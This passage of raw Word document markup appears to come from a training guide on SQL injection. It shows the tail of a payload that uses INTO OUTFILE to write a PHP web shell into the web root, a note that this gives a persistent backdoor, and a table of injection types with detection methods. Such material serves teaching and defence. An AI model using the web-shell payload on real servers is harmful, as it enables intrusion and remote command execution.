        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  INTO OUTFILE '/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Writing a PHP web shell to the web root gives the attacker a persistent backdoor with the ability to execute arbitrary commands on the server through a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Types of SQL Injection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960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E61C9D">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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detection Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>In-Band SQLi (Classic)</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Results returned in same channel as the attack. Includes Error-Based and UNION-Based.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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Visible errors or output changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Error-Based SQLi</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Forces the database to generate error messages that reveal information.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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database error messages in response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UNION-Based SQLi</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Uses UNION operator to append results of attacker's query to the original.</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extra rows in response output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind Boolean-Based</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No output visible; inferred from true/false differences in page response.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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Page content/length changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind Time-Based</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No output visible; inferred from server response delays.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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Response time measurement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Out-of-Band SQLi</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data exfiltrated via separate channel (DNS/HTTP). Used when other methods are blocked.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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DNS logs, network monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Second-Order SQLi</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload stored in DB first, then executed when retrieved by a different query.</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Audit stored data usage patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D" w:rsidP="004B019E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E61C9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6686F" w:rsidRDefault="0066686F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0066686F" w:rsidRDefault="006668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1C9D" w:rsidRDefault="00E61C9D" w:rsidP="00022801">
    <w:pPr>
      <w:spacing w:before="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6686F" w:rsidRDefault="0066686F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0066686F" w:rsidRDefault="006668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1C9D" w:rsidRDefault="00E61C9D" w:rsidP="00022801">
    <w:pP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E918FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E2807E2"/>
    <w:lvl w:ilvl="0" w:tplc="E4CE72B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2FBEE206">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A6E2AC4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="831890FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64FCB708">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3920033C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4E906240">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C8643B44">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FEC69E50">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="21EC06CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE64F66E"/>
    <w:lvl w:ilvl="0" w:tplc="A1083D76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="60921AAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6DD29832">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2AFE9A30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9880D08C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0F72CE32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D9C01DBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="10607D08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FA589428">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34FD012D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8E28AC2"/>
    <w:lvl w:ilvl="0" w:tplc="CA26AF64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="407E8AEA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FB08F52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E326EE84">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CE9E0C5A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="22DE0CD4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="888CD6D4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="03D2C756">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D5A24108">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C9D"/>
    <w:rsid w:val="0000485A"/>
    <w:rsid w:val="00022801"/>
    <w:rsid w:val="002D059A"/>
    <w:rsid w:val="002D42EB"/>
    <w:rsid w:val="0034719F"/>
    <w:rsid w:val="004B019E"/>
    <w:rsid w:val="0066686F"/>
    <w:rsid w:val="007064E1"/>
    <w:rsid w:val="00940276"/>
    <w:rsid w:val="00E61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E16B9"/>
  <w15:docId w15:val="{D93DA995-A3D1-4631-B608-BAFD7F561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6"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E5090"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C0392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D42EB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002D42EB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D42EB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002D42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5</Pages>
  <Words>1285</Words>
  <Characters>7329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NGALA</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-11T09:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-12T19:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>